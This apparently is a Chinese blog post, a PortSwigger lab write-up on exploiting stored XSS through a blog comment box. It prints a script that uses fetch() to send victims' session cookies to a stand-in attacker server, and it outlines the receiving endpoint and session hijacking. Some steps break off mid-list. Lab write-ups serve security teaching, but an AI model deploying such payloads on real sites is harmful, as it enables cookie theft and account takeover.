
Bash Overflow
5分钟阅读 · 2025年8月6日
免责声明:
本文档中描述的技术仅用于道德用途和教育目的。在未经授权的环境中未经批准使用这些方法是严格禁止的,因为这是非法、不道德的行为,并可能导致严重后果。
务必负责任地行事,遵守所有适用法律,并遵循既定的道德准则。任何利用安全漏洞或危害他人安全、隐私及完整性的行为都是严格禁止的。
在 PortSwigger 提供的这个实验室环境中,我们探索了一个存在于示例网站博客评论功能中的存储型跨站脚本(XSS)漏洞。该漏洞允许攻击者在评论部分注入恶意脚本,当其他受害者用户浏览该博客文章时,恶意脚本会在其浏览器中执行。
1. 注入恶意载荷
首先,攻击者在博客文章的评论框中提交以下恶意JavaScript代码作为评论内容:
<script>
fetch('https://恶意服务器.net/steal?cookie=' + document.cookie);
</script>技术解析:当其他用户(受害者)访问此页面时,该<script>标签内的代码会在其浏览器中自动运行。document.cookie用于获取受害者的当前会话Cookie,然后通过fetch请求将这些敏感数据发送到攻击者控制的远程服务器(https://恶意服务器.net/steal?cookie=)。
2. 搭建攻击者服务器
攻击者需要在其控制的服务器上设置一个端点(例如/steal)来接收并记录窃取到的Cookie数据。当受害者的浏览器向此URL发送GET请求时,服务器会将Cookie参数的值保存下来。
3. 窃取并利用Cookie
一旦受害者访问包含恶意评论的博客文章,他们的Cookie就会被发送到攻击者的服务器。攻击者获取到Cookie后,可以使用浏览器扩展 Cookie-Editor 等工具:
这种存储型XSS漏洞的成功利用将导致严重的账户劫持风险:
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。